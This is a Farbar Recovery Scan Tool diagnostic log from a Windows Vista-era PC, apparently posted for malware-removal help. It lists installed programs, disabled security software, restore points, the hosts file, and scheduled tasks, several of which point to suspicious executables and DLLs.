2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-25 10:57
 
==================== End Of Log ============================


Addition

 


Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014

Ran by savas.kyriakidis at 2014-08-25 13:41:46

Running from F:\

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}

AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}

AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}

AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)

32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden

6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)

Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden

ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)

Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden

Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)

Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)

Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)

Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )

AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)

AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden

BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden

BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden

Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)

BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden

CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden

ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden

ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden

CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)

Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)

Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)

Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)

Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden

DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden

DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden

DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )

Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)

Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)

GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)

HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)

HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)

HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)

HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)

HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)

HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)

HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden

HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)

iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)

iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)

Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)

MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden

MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)

Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden

Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden

Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)

Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden

Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden

Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden

Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)

Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden

OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)

PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)

ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden

QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)

Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)

Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )

Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden

Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden

Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden

Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden

SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)

SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)

SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden

Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden

Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)

Skins (Version: 2007.0731.2234.38497 - ATI) Hidden

SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden

SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)

TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden

UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)

Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)

Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)

Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)

Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)

Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)

Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)

Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)

Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)

WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

 

==================== Restore Points  =========================

 

29-07-2014 11:25:23 Scheduled Checkpoint

30-07-2014 11:45:57 Scheduled Checkpoint

01-08-2014 21:10:36 Scheduled Checkpoint

02-08-2014 16:42:56 Scheduled Checkpoint

04-08-2014 04:00:03 Scheduled Checkpoint

07-08-2014 22:48:19 Scheduled Checkpoint

11-08-2014 02:11:41 Scheduled Checkpoint

11-08-2014 15:01:42 Scheduled Checkpoint

12-08-2014 10:45:08 Scheduled Checkpoint

14-08-2014 02:36:25 Scheduled Checkpoint

14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59

14-08-2014 23:31:34 Advanced-System Protector

15-08-2014 23:47:04 Removed SofTest

16-08-2014 13:18:06 Removed DriverUpdate

16-08-2014 13:29:10 Removed HTC Sync.

16-08-2014 13:44:46 Removed HTC Sync.

16-08-2014 14:02:17 Removed HTC BMP USB Driver.

16-08-2014 16:47:50 Advanced-System Protector

16-08-2014 21:58:06 Installed AVG 2014

16-08-2014 22:11:41 Removed SlimCleaner Plus

16-08-2014 22:14:50 Removed HTC Driver Installer.

17-08-2014 19:56:09 Installed AVG 2014

17-08-2014 19:59:04 Installed AVG 2014

17-08-2014 20:03:04 Removed AVG 2014

17-08-2014 20:04:51 Installed AVG 2011

17-08-2014 21:08:16 Installed AVG 2014

17-08-2014 21:16:20 Installed AVG 2014

17-08-2014 21:24:43 Removed AVG 2014

17-08-2014 21:26:10 Installed AVG 2011

19-08-2014 21:04:48 Advanced-System Protector

21-08-2014 01:40:12 Advanced-System Protector

23-08-2014 20:47:11 Checkpoint by HitmanPro

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM

Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION

Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe

Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe

Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)

Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)

Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)

Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer

Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI

Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe

Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages

Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)

Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe

Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe

Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)

Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION

Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)

Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)

Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()

Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe

Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

 

==================== Loaded Modules (whitelisted) =============

 

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll

2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll

2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll

2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll

2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll

2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll

2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

